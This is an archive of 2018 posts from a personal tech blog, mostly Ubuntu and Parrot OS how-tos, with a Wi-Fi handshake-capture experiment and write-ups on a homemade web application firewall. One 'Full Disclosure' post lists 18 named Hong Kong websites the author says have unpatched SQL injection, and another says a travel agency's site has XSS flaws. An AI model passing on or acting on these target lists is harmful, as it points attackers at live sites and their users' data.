In order to understand how does it work for the security of a wireless network, I did some experiments for the purpose.

Hardware

(1) Home wireless router with the feature of Protected Management Frames;
(2) Android 6.0 at 2.4GHz smartphone;
(3) Android 7.0 at 5GHz smartphone;
(3) Macbook Pro (Retina Mid 2012) with macOS High Sierra (10.13.4) at 5GHz;
(4) Macbook Air (Mid 2013) with macOS High Sierra (10.13.4) at 5GHz;
(4) Lenovo Thinkpad X201s (as 2.4GHz attacker); and
(5) TP-Link Archer T4UHP (as 2.4/5GHz attacker)

Software

(1) Parrot Security OS 4.0.1 64-bit;
(2) WAIDPS 1.0 R6j; and
(3) Aircrack-NG 1.2

Lenovo Thinkpad X201s installed Parrot Security OS 4.0.1 with the latest update and running WAIDPS which is powered by Aircrack-NG 1.2 as attacker.

The home wireless router and the testing wifi devices are set to WPA2 and AES encryption. The firmware of the wireless router is up-to-date. Since the home wireless router is dual bands, 2.4GHz and 5GHz, I set some of the testing devices to 5GHz. The home wireless router is set to AP mode as I already have a wired router in the network.

Once the 4-way handshake is captured from wireless router and devices, attackers can brute force the captured packets to obtain the passphrase of the wireless router.

Experiment

The Protected Management Frames can be set to "disabled", "capable" and "required" on the home wireless router.

(a) Disabled

When the Protected Management Frames (PMF) at the wireless router is set to "Disabled". All wireless devices can be disassociated and the 4-way handshake can be captured.

(b) Capable

When the PMF is set to "Capable" at the wireless router, all devices can connect to the router without problem. However, the wireless devices can be disassociated and the 4-way handshake can be captured.

(c) Required

When the PMF is set to "Required", only Macbook Pro and Macbook Air can be connected to the wireless router and it cannot be disassociated as well as the 4-way handshake cannot be captured.

(d) extra

When the PMF is set to "Capable" and all the devices are disconnected as well as re-connected to the wireless router, the 4-way handshake can be captured.

When the PMF is set to "Required" and Macbook Pro as well as Macbook Air are disconnected and re-connected to the wireless router, the 4-way handshake cannot be captured.

Conclusion

Purchase a wireless router that equipped with Protected Management Frames feature and set it to WPA2, AES and PMF to "Required" with wireless devices that compatible to PMF, such as macOS 10.13.4.

However, not all wireless routers and/or wireless devices are equipped with this feature even it is an expensive/high-end or commercial model.

Finally, when you find a wireless router that equipped with this feature, make sure to update the firmware to the latest version often.

By the way, I am unwilling to provide the brand name of the home wireless router that I tested. Sorry for that!

That's all! See you.


Wednesday, May 23, 2018

Ubuntu 18.04 LTS Performance Tuning or not

After several experiments, I confirmed that previous performance tuning for Ubuntu 16.04 LTS does not fit for Ubuntu 18.04 LTS. The previous performance tuning, such as hard drive read/write, will slow down the performance of Ubuntu 18.04 LTS. If you implemented such tuning in Ubuntu 18.04 LTS and noticed the performance drops, you may consider to turn it off or disable it.

For example,

echo 1024 | sudo tee /sys/block/sda/queue/read_ahead_kb
echo 1024 | sudo tee /sys/block/sda/queue/nr_requests


That's all! See you.


HOWTO : Upgrade Parrot Security OS 3.11 to 4.0.1

Parrot Security OS 4.0.1 is released recently. You can upgrade to the latest version by the following commands.

sudo apt purge tomoyo-tools
sudo apt update
sudo apt full-upgrade
sudo apt autoremove


That's all! See you.


Wednesday, May 16, 2018

HOWTO : Install golang 1.10 on Ubuntu 18.04 LTS

The current version of golang in Ubuntu 18.04 LTS is 1.10.1 at the time of this writing.

Install

sudo apt update
sudo apt install golang


Check

go env
go version


Workspace

mkdir -p {,~/go/bin,~/go/pkg,~/go/src}

That's all! See you.


Sunday, May 13, 2018

HOWTO : Install Gnome Shell Extensions on Ubuntu 18.04 LTS

Ubuntu Desktop 18.04 LTS is now default with Gnome. You can tune the Gnome with this tool.

sudo apt update
sudo apt install gnome-tweaks gnome-tweak-tool


The following are some useful Gnome Shell Extensions that come with Ubuntu 18.04.

If your computer or laptop do not has hard disk led, this extension is good for you.

sudo apt install gnome-shell-extension-hard-disk-led

If you do not have multi-media keyboard, this extension is for you.

sudo apt install gnome-shell-extension-mediaplayer

You can monitor the CPU loading, Memory usage and Internet traffic with this extension.

sudo apt install gnome-shell-extension-system-monitor

You can know current and forecast of your local weather with this extension.

sudo apt install gnome-shell-extension-weather

If you have some old system tray icons, you may need this extension. However, some old system tray icons do not compatible with this extension.

sudo apt install gnome-shell-extension-top-icons-plus

Run Gnome Tweaks to enable the extension(s) that you have installed. After that, logout and re-login.

To see all the Gnome Shell Extensions that come with Ubuntu 18.04.

apt-cache search gnome-shell-extension

That's all! See you.


HOWTO : Upgrade Ubuntu Gnome 16.04 LTS to Ubuntu Desktop 18.04 LTS

There is no version 18.04 for Ubuntu Gnome at the moment. If you want to upgrade from Ubuntu Gnome 16.04 to Ubuntu 18.04, you can follow the procedure below.

Step 0 :

update-manager -cd

After that, reboot the box.

Step 1 :

sudo apt remove gnome-session ubuntu-gnome-desktop gnome-session-flashback plymouth-theme-ubuntu-gnome-text plymouth-theme-ubuntu-gnome-logo gnome-session-flashback

select "gdm3" when asked.

Step 2 :

sudo update-alternatives --config default.plymouth

select "auto mode" of "/usr/share/plymouth/themes/ubuntu-logo/ubuntu-logo.plymouth"

Step 3 :

sudo update-initramfs -u

Then reboot.

That's all! See you.


HOWTO : Radiotray-NG on Ubuntu 18.04 LTS

Radiotray-NG is internet radio program to streaming music and online radio.

wget https://github.com/ebruck/radiotray-ng/releases/download/v0.2.2/radiotray-ng_0.2.2_ubuntu_18.04_amd64.deb
sudo dpkg -i radiotray-ng_0.2.2_ubuntu_18.04_amd64.deb
sudo apt --fix-broken install


RTHK Radio Channels (Optional)

Radio 1 - http://rthk.hk/live1.m3u
Radio 2 - http://rthk.hk/live2.m3u
Radio 3 - http://rthk.hk/live3.m3u
Radio 4 - http://rthk.hk/live4.m3u
Radio 5 - http://rthk.hk/live5.m3u
Putonghua - http://rthk.hk/livepth.m3u

After adding or editing the channels, make sure to reload the bookmarks.

That's all! See you.


Thursday, May 10, 2018

HOWTO : Install Deepin Desktop Environment on Ubuntu Desktop 18.04 LTS

Deepin Desktop Environment (DDE) is an open source project by Deepin Technology Ltd. Co., Wuhan, China. Besides install Deepin Linux 15.5 or higher, you can install it on Ubuntu Desktop 18.04 LTS.

Install Deepin Desktop Environment (DDE)

sudo add-apt-repository ppa:leaeasy/dde
sudo apt-get update
sudo apt install dde


The following is for experiment only (not recommended by the PPA creator).

sudo apt install dde deepin-gtk-theme dde-control-center-plugin-notify dde-control-center-plugin-weather redshift libfprint0 dnsmasq cgroup-tools imwheel libpam-fprintd fprintd network-manager-l2tp network-manager-openconnect network-manager-openvpn network-manager-vpnc minicom deepin-calculator dde-file-manager

Install RecordMyDesktop (Optional)

sudo apt install gtk-recordmydesktop

* when "Window Effect" is disabled, "Deepin Screen Recorder" and "Multitasking View" will be disabled too.

Set Font of the system (Optional)

Set Font to "Ubuntu" and "Ubuntu Mono" and set font size larger when necessary.

Disable Window Effect Mode (Optional)

When you find booting to desktop taking a longer time and playing video files lagging, you need to consider to disable the Window effect as your display card is not strong enough.


The following optional settings are for Chinese only. Ubuntu default ibus is not compatible with Deepin DDE and you need to use fcitx instead.:

If you are using English version Ubuntu, you are required to install the Traditional Chinese fonts or Simplified Chinese fonts.

Traditional Chinese

sudo apt install language-pack-gnome-zh-hant-base language-pack-gnome-zh-hant

or

Simplified Chinese

sudo apt install language-pack-gnome-zh-hans-base language-pack-gnome-zh-hans

Install Cangjie Quick Input Method (Optional)

sudo apt install fcitx fcitx-table-quick-classic fcitx-config-gtk

Install Cantonese Input Method (Optional)

sudo apt install fcitx fcitx-table-cantonese fcitx-config-gtk

Install Cangjie 3rd Generation Input Method (Optional)

sudo apt install fcitx fcitx-table-cangjie3 fcitx-config-gtk

Install Cangjie 5th Generation Input Method (Optional)

sudo apt install fcitx fcitx-table-cangjie5 fcitx-config-gtk

After installing desired Chinese Input Method, go to "Language Support" to set from "ibus" to "fcitx" and make sure to install missing packages when asked in launching "Language Support". To toggle the Input Method by pressing "Ctrl+Space" and set your Input Method as default when necessary.





You can even switch between Gnome and Deepin desktop environment when you are going to login. If you want to delete the Deepin DDE forever, you can run the following commands :

sudo apt remove dde

or

sudo apt remove dde dde* deepin* deepin-gtk-theme dde-control-center-plugin-notify dde-control-center-plugin-weather redshift libfprint0 dnsmasq cgroup-tools imwheel libpam-fprintd fprintd network-manager-l2tp network-manager-openconnect network-manager-openvpn network-manager-vpnc minicom deepin-calculator dde-file-manager
sudo apt autoremove
sudo apt update



Reference

How to Install Deepin Desktop Environment on Ubuntu 18.04

That's all! See you.


Tuesday, May 01, 2018

HOWTO : upgrade Ubuntu 16.04 LTS to 18.04 LTS on Croissants

First of all make sure your Croissants box has sufficient free hard drive spaces, otherwise, the upgrade will fail.

sudo apt install update-manager-core
sudo do-release-upgrade -d


Answer "Y" to all questiones asked.

After the upgrade, you need to run the following commands :

Remove the first "# " from /etc/apt/sources.list.d/evebox.list
Remove the first "# " from /etc/apt/sources.list.d/elastic-5.x.list

sudo update-java-alternatives -s java-1.8.0-openjdk-amd64
sudo systemctl enable logstash
sudo systemctl enable elasticsearch
sudo systemctl enable kibana


Then you can reboot your Croissants.

That's all! See you.


HOWTO : Upgrade Ubuntu Server 16.04 to 18.04

Ubuntu 18.04 LTS is just released. It is a high time to upgrade your Ubuntu Server 16.04 LTS to 18.04 LTS. To upgrade it, make sure you have sufficient free space.

Step 1 :

sudo apt install update-manager-core
sudo do-release-upgrade -d


You need to answer "Y" to all questions asked.

Step 2 :

Make sure to enable all the required repositories at /etc/apt/source.list.d/ and then run the following command.

sudo apt update

Step 3 :

If you have application that works only on Java 8, make sure to do the following.

update-java-alternatives -l
sudo update-java-alternatives -s java-1.8.0-openjdk-amd64


or

sudo update-alternatives --config java

Then, select Java 8

Step 4 :

If your system is running PHP, you need to reinstall all the required packages. For example,

sudo apt-get install php7.2-cgi php7.2 php7.2-cli php7.2-mysql php7.2-curl php7.2-gd php7.2-intl php7.2-imap php7.2-pspell php7.2-recode php7.2-sqlite3 php7.2-tidy php7.2-xmlrpc php7.2-xsl apache2-utils php7.2-fpm php-memcache php-imagick mysql-server mysql-client php7.2-mbstring php7.2-zip

Make sure to do the following when you are using php7.2-fpm on Apache2 :

sudo a2enmod php7.2
sudo a2enconf php7.2-fpm
sudo systemctl enable php7.2-fpm
sudo systemctl enable apache2
sudo systemctl restart php7.2-fpm
sudo systemctl restart apache2


That's all! See you.

Thursday, April 26, 2018

HOWTO : Install Parrot Security OS 3.11 32-bit

Since the 32-bit of Parrot Security OS 3.11 will crash in the middle of the installation even the hash checksum is same as the official, we can install "Home" version and then install the necessary tools by the following command.

sudo apt update
sudo apt install parrot-tools-full


That's all! See you.


Tuesday, April 24, 2018

Deepin Linux 15.5

中國武漢深度科技公司的深度作業系統 15.5 (Deepin Desktop) 是基建於 Debian Linux 的桌面系統。深度系統實現了 Linux 的高度客制化的技術,它媲美蘋果電腦 macOS 作業系統。

深度系統 15.5 安裝容易和直接,沒有太多的輸入和選項。當安裝在 Virtualbox 虚擬機器時,它會提供特效模式 (Effect mode) 或普通模式 (Common mode) 選擇。普通模式運作行得比較快,但沒有了特別效果。

在使用深度系統 15.5 時極有使用蘋果電腦 macOS 的感覺。使用介面非常直觀和華麗,你並不會迷失於大量的選項當中。

它的軟件庫 (Deepin Store) 收集了很多實用的軟件,並且安裝和移除都非常容易。它的軟件庫極有蘋果電腦 macOS 的 Apps Store 味道。可以看得出武漢深度科技公司曾經投入大量資源來開發這系統。

這個作業系統極之適合 Linux 初學者或一些要求簡潔和直接的用家。這也是 Ubuntu Linux 以外的另一個不錯的選擇。但是美中不足之處是它沒有全碟加密和密碼只接受最多十六位字元,而且有些軟件的版本比較老舊。




Wuhan Deepin Technology Co. Ltd. (China) develops a Debian based Linux system namely Deepin Desktop. The current version as at this writing is 15.5. The outlooks of Deepin is much like Apple macOS.

Installation of Deepin 15.5 is very easy and simple. A few information is required to fill in or select in the installation. When installed in Virtualbox, you have a chance to select "Effect mode" or "Common mode". Common mode is the fastest mode comparing with Effect mode. Deepin Desktop 15.5 is very easy to use. The design is very straight forward and simple. If you have experience in Apple macOS, you will feel that it is very similar.

There are some useful software in Deepin Store and it much like Apps Store in macOS. The installation and uninstallation of any software is very easy. It is believed that Wuhan Deepin Technology has invested a lot of resources of building this Linux distribution.

Deepin Desktop is suitable for newbies of Linux and someone who loves simple operation. If you do not like Ubuntu Linux, you may try Deepin Desktop instead. The only downsides of Deepin are no full disk encryption, the maximum length of user password limited to 16 characters and some software are a little bit out-dated.

That's all! See you.


Reference

Linux Deepin is NOT spyware


Full disk encryption on Deepin 15.5




Sunday, April 22, 2018

Linux 的我見

每一個人選擇使用 Linux 的原因和理由各有不同,但大部份人都是原先是使用視窗 (Windows) 的。他們大多都有一個共同點,就是經常抱怨找不到和視窗一樣的應用軟體的代替品。但這個問題鮮有在蘋果 (Apple macOS) 的使用者中發生。問題是出在那裡呢?

視窗、蘋果及 Linux 在基本上是不同的產品,它們都有着自己的特性。蘋果是源於 BSD 系統,它是 Unix 系統;Linux 是類 Unix 系統及自行開發;而視窗是一個自行開發的非 Unix 系統。它們都有着的不同發展方向,除了 Linux,視窗和蘋果都很早在桌面 (Desktop) 方面上應用。

視窗專門經營軟體業務,而蘋果則為主要經營硬件業務,而 Linux 基本上是非牟利的。

蘋果也沒有很多與其他商業化產品一樣的代替品,但蘋果用戶並沒有如其他的視窗使用者使用 Linux 時的要求和抱怨。我想是因為蘋果用戶是一個獨特的使用群組,他們沒有抱怨沒有相似的代替品,但他們接受使用與視窗用戶所使用的不一樣和與別不同的產品。

基於 Linux 是開源及基本上是免費的,大多數的開發人員都是利用自己的私人時間來開發軟體,所以其開發出來的軟體大多數沒有在商業化上作出考慮;多數的開發人員都是開發給自己或一小撮人使用。其後他們有的也開發了一些與其他商業化產品的類似物,但並非是其代替品,也有一些應用是其他商業化產品沒有的。Linux 的獨特性可見一班。

其實視窗的使用者在使用 Linux 時不應有與使用視窗的要求。應當接受各個不同類型的作業系統的不同特性和發展。視窗的使用者與蘋果的用戶在性格上和要求上大有不同,在此,我非常欣賞蘋果用戶的可塑性。所以視窗的使用者對 Linux 會不會過於「又要馬兒好,又要馬兒不吃草」呢?

開源的 Linux 造就各式各樣的版本,各個版本都有其獨特的性格。各個版本的基本操作指令和架構是大致相同,最大的分別在於軟件包管理指令和桌面系統 (Window Manager)。不同版本的 Linux 有不同版本的軟件包管理和桌面系統。

Linux 吸引之處在於可塑性非常高,客制性的能力可以出神入化。再加上所有編程語言和編譯器是完全開源和免費的。這做就了多樣化的工具軟件供給多樣化的應用。每個軟件工程師都可建做自己具有個人特色的 Linux 版本或應用系統。

至於為何沒有與其他作業系統的應用軟體一模一樣的產品,我想這與知識產權不無關係的,這就不能怪責 Linux 的不體貼了。俗語有話「若要人似我,除非兩個我」。


Friday, April 20, 2018

Wordpresscan - Wordpress Security Scanner

Wordpresscan is a Wordpress CMS security auditing tool which is rewritten WPScan in Python and implemented some idea of WPSeku by swissky. However, the original copy in Github is still in alpha version and dated Oct 15, 2017.

Wordpresscan is then forked by Samiux on Apr 19, 2018 and some improvements as well as bugs fix on it. The modified version is released in Open Source under GPLv3 by Samiux.

It is well tested on Parrot Security OS 3.11 and it can run right away on Parrot without installation.





You can visit the official site for details.

That's all! See you.


Monday, April 16, 2018

HOWTO : Update Parrot Security OS 3.11

Parrot Security OS 3.11 cannot be updated properly with the default updater after freshly installed. We can update it manually.

sudo apt update
sudo apt -y full-upgrade --allow-downgrades
sudo apt -y autoclean
sudo apt -y autoremove


When asking for update the configure files, select "Y" when necessary.

That's all! See you.


HOWTO : Fallback to OpenJDK 8 on Parrot Security OS 3.11

Since OpenJDK 9 is installed for the recent update on Parrot Security OS 3.11, some Java applications that are using OpenJDK 8 may not work properly. We can fallback to OpenJDK 8 easily.

sudo update-alternatives --config java

Then select OpenJDK 8 or OpenJRE 8 when necessary. You can change back to OpenJDK 9 at any time with the same command.

That's all! See you.


Sunday, April 15, 2018

HOWTO : Fix Vokoscreen 2.5.0 on Parrot Security OS 3.11

Vokoscreen 2.5.0 on Parrot Security OS 3.11 does not work properly as ffmpeg crashed. You can fix this problem by replacing the ffmpeg with Vokoscreen's copy.

wget http://linuxecke.volkoh.de/vokoscreen/ffmpeg-64bit.tar.gz
tar -xvzf ffmpeg-64bit.tar.gz

sudo mv /usr/local/bin/ffmpeg /usr/local/bin/ffmpeg-original
sudo cp ffmpeg /usr/local/bin/


That's all! See you.


Tuesday, March 20, 2018

Longjing - Deep Learning Driven Web Application Firewall

Longjing is Chinese green tea and full of antioxiants. It is good for health and to fight against cancer. Longjing Web Application Firewall (WAF) is deep learning driven and developed with Python 3 and Scikit-Learn library. To define it as deep learning is that it uses neural network MLP Classifier to build the model. Even it is a simple neural network MLP classifier, the accuracy rate is very high. It supports Linux system only.

Longjing WAF is mainly design to protect the web applications from being attacked by SQL Injection (SQLi) which is at the top of OWASP Top 10 in 2017. If successfully attacked, data leakage and/or system compromised will be caused. It is a critical vulnerability for web applications.

Longjing WAF is well tested on Damn Vulnerable Web Application (DVWA) with Burp Suite, SQLMap, OWASP ZAP, XSSER and Commix. Not only detects SQLi but also XSS (Cross-site Scripting). The accuracy rate is over 99% under the samples testing. It can be further tune for the false positive easily as the running code is an open source project that released under GPLv3 by Samiux. However, the training data and modelling are not open sourced.

It is not very complicate to install and deploy it. The latest version as at this writing is version 0.9.1. It works with Anaconda 3 and MitmProxy 3.0.3. Anaconda will install all required SciKit-Learn Python Libraries for you and it is also very easy to maintain. MitmProxy will act as a proxy to deal with the HTTP/HTTPS requests and responses.

Longjing is the next generation Web Application Firewall! Fetch it and try!

That's all! See you.


Reference

Longjing - Web Application Firewall

Saturday, March 03, 2018

[Full Disclosure] Vulnerable Web Sites In Hong Kong (March 2018)

Since I am not a White Hat, I will disclose all my findings fully to the public. Do not blame me for that! I am a Grey Hat.

Recently, I found out that the personal web site of the anti-government politician in Hong Kong, Claudia Mo, has been hacked since 2016. Some China relevance videos and statement had been posted to the site since 2017. Meanwhile, the volunteers' personal particulars had been leaked in the Pastebin since 2016. The most important thing to know is that the site was protected by Cloudflare, a kind of cloud based DDoS protection and web application firewall (WAF).

I conducted a very simple and quick check on the site some days before yesterday and confirmed that her site was vulnerable to blind sql injection. However, her site has been deleted since yesterday (March 2, 2018, Hong Kong Time).

After a simple search, it was confirmed that the site was developed by OneTeam.hk. Some other sites that are developed by them has been obtained by Google search and from their official site. Another quick and simple tests on those sites has been conducted.

The result shows that about 18 web sites are vulnerable to sql injection vulnerability. It seems that those sites are developed by a vulnerable library.

The url of those sites are listed at the below for reference. It may not be a completed list. I do not responsible to any lost or/and damages caused once those sites have been disclosed. You have been warned that you will be put into the jail when you attack or doing evil on those sites.

Finally, some web developers in Hong Kong cannot build a secure web site properly. They believed that Cloudflare can protect the sites in a very secure manner. Cloudflare WAF can be bypassed very easily. Before investing money to your web sites, please consider the ability of the web developers and the security of the web applications.

Vulnerable sites :

http://www.geosecurities.com.hk/
http://www.charleskwok.hk/
http://shopkeeper.oneteam.hk/silverhealth/index.php
http://www.wiseland.com.hk/
http://www.islandsouth.hk/
http://www.hkdogschool.com/
http://www.newrecordltd.com/
http://www.winner28.cc/
http://www.ur-choize.com/
http://sealairsoft.com/
http://www.instantbuy.hk/
http://www.iiistyle.com/
http://www.toptrendint.com/
http://www.studioone.hk/
http://www.walterly.com.hk/
http://www.kangxi.hk/
http://www.crazymorestore.com/
http://www.trusty.hk/

Non vulnerable sites :

http://oneteam.hk/
http://www.musicianxdesigner.com/
http://shopkeeper.oneteam.hk/bq/
http://www.jpmyhouse.hk/
https://www.swordtacticalsupply.com/
http://taodeliver.mofa.ht/
http://www.mingkoi.com/
http://www.wai-hei.com/
http://innercare.com.hk/
http://www.95gd.hk/
http://siman.com.hk/

That's all! See you.


Monday, February 26, 2018

Longjing - Machine Learning Driven Web Application Firewall

Longjing is Chinese green tea with a lot of antioxiants. It is good for health. Longjing Web Application Firewall (WAF) is machine learning driven and it is designed to protect the web application from being attacked by SQL injection.

Longjing WAF is written in Python and It is not designed for the high performance in mind. Only Linux is supported.

Longjing WAF can protect your web application from being scanned by Burp Suite, SQLMap, OWASP ZAP, XSSER and Commix even your web application has SQL injection vulnerability. Meanwhile, reflected Cross Site Scripting (XSS) can be detected too.

SQL injection is on the top position of the OWASP Top 10 2017 which can lead to data leakage and/or system compromised. It is a critical vulnerability.

Longjing WAF is a PARTIALLY Open Source Project under GPLv3 License by Samiux. Training and Modelling are NOT open sourced. Demo may be provided when necessary.

The training requires about 3 hours on Intel i7-5500U with 16GB RAM. The accuracy rate is over 99%. The Longjing requires about 3GB RAM to run.

Requirement

- Ubuntu Linux Server 16.04.4 LTS
- Anaconda3
- mitmproxy
- web server
- web application
- SSD is recommended
- at least 8GB RAM

Installation

(A) Install Anaconda

sudo apt install build-essential libssl-dev libffi-dev python3-dev

wget https://repo.continuum.io/archive/Anaconda3-5.1.0-Linux-x86_64.sh

chmod +x Anaconda3-5.1.0-Linux-x86_64.sh

sudo -sH

./Anaconda3-5.1.0-Linux-x86_64.sh

install anaconda3 to /etc/anaconda3 and then answer "yes" to allow change the .bashrc of root.

source /root/.bashrc

(B) Update Anaconda

sudo -sH
conda update --prefix /etc/anaconda3 anaconda
conda update -n base conda


(B) Install mitmproxy

sudo -sH
conda install pip
pip install mitmproxy


The current version of mitmproxy at this writing is 3.0.3.

Exit to normal user by entering exit.

(C) Update mitmproxy

sudo -sH
cd /etc/anaconda3
pip install mitmproxy --upgrade


(D) Install Longjing

wget https://www.infosec-ninjas.com/files/longjing-0.8.0.tar.gz
tar -xvzf longjing-0.8.0.tar.gz

cd longjing

nano config.conf


where :
- NET_INF is the network interface of the mitmproxy to be listening
- PORT is port number of the mitmproxy to be listening, e.g. 8080
- CERT is the location path of the private key TLS/SSL certificate of the domain when available. It should be starting with --certs.

Please read mitmproxy "about certificate" documents for details - Using a custom certificate.

sudo ./install.sh

Finally, make sure to copy index.html to the web application root directory.

(D) Running

sudo systemctl restart longjing.service

(E) Testing with Tools

Longjing is well tested on Damn Vulnerable Web Application (DVWA) with the following tools :

- Burp Suite on DVWA (sqli and xss blocked except DOM)
- sqlmap on DVWA (tamper also blocked)
- OWASP ZAP on DVWA (sqli and xss blocked)
- xsser on DVWA (xss blocked)
- Commix on DVWA (blocked and Commix will hang in the middle)

That's all! See you.


Thursday, January 18, 2018

HOWTO : Install MicroCode in Ubuntu Linux

Linux can update microcode to fix Meltdown and Spectre vulnerabilities instead of BIOS update. Ubuntu can fix the vulnerabilities with just one command.

sudo apt update
sudo apt dist-upgrade


For Intel CPU :

sudo apt install intel-microcode

For AMD CPU :

sudo apt install amd64-microcode

After that, reboot your Ubuntu box.

That's all! See you.


Update on JAN 24, 2018

Since Linux creator Linus Torvalds disagrees to install Intel's patches for Spectre, the Intel microcode is patched back to the previous version. You are not required to uninstall it. You just update and it will patch it back to the previous version. Please see The Hacker News for details.

sudo apt update
sudo apt dist-upgrade



Monday, January 08, 2018

New Year New You 2018!

This year, I am interested in Machine Learning Python Programming. The useful Python 3.x environment is to install Anaconda. Download the shell script and it will install all the related Python 3.x and Python Libraries for you. Your Linux may have 2 copies and 2 versions of Python and their libraries. You can uninstall Anaconda when you do not need it. This tool is very easy to use. You can also use Jupyter Notebook for the development.

Since I am not good at maths, I am going to find a more easier way to learn Machine Learning. The following is the list that I found from the internet which I can understand about Machine Learning programming and concept.

I just modified faizann24's Python script and the demo is below :




I write the script from the scratch. The demo is here :



The following demo is version 0.3 of the Machine Learning Driven Web Application Firewall :



The following demo is version 0.5 of the Machine Learning Driven Web Application Firewall. It is running much faster than previous versions :



Reference

[1] Josh Gordon's Machine Learning Recipes Video
[2] Machine Learning for Complete Beginners
[3] Machine Learning for Security Informatics
[4] Machine Learning is Fun
[5] FWAF Machine Learning Driven Web Application Firewall
[6] FWAF Machine Learning Driven Web Application Firewall (GitHub)
[7] Machine Learning Tutorial Video
[8] How To Build a Machine Learning Classifier in Python with Scikit-learn

That's all! See you.


Friday, January 05, 2018

New year New Hack 2018!

On Jan 4, 2018, GoldJoy Holidays reports that their server has been hacked. It is the second local travel agency company has been hacked in this month so far. The first one is Big Line Holiday which is hacked on Jan 3, 2018.

Big Line Holiday is hosting on their own server which is running Microsoft IIS 8.5 and PHP 5.5.30 with no SSL certificate. On the other hand, Goldjoy Holidays is hosting on web hosting company (the name is unknown to me) which is running Debian Linux, Apache 2.4.10 and PHP 5.6.31. It is believed that Big Line Holiday is running a custom web application while GoldJoy Holidays is running Joomla! Meanwhile, both of them are without security headers.

Today, Jan 5, 2018, GoldJoy Holidays announces that they applied layers of firewall to their website. I curious to know what kind of firewall they applied.

After a quick check, GoldJoy Holidays is now running behind Cloudflare and believed that it is either a free plan or Pro plan. The Cloudflare WAF (Web Application Firewall) may be set to high sensitive and SSL certificate is set. However, the SSL certificate provided by Cloudflare is a share certificate and the IT staff of GoldJoy Holidays misconfigures it. Since the site has no appropriated security headers, it may be affected by MITM (Man-In-The-Middle) attack.

The website of GoldJoy Holidays has several XSS (Cross Site Scripting) vulnerability and several suspected SQLi (SQL Injection) vulnerability. In addition, the website has some other minor problems related to security too. It is believed that the web application is Joomla! 1.5.x.

In my opinion, Cloudflare is not a good solution when your vulnerabilites at your website are not fixed. It will mislead the IT staff or users that your site is secure. Cloudflare WAF can be bypassed. I hope that it is a workaround solution, otherwise, it is still danger.

Reference

[1] Yahoo News
[2] South China Morning Post News
[3] TVB News

That's all! See you.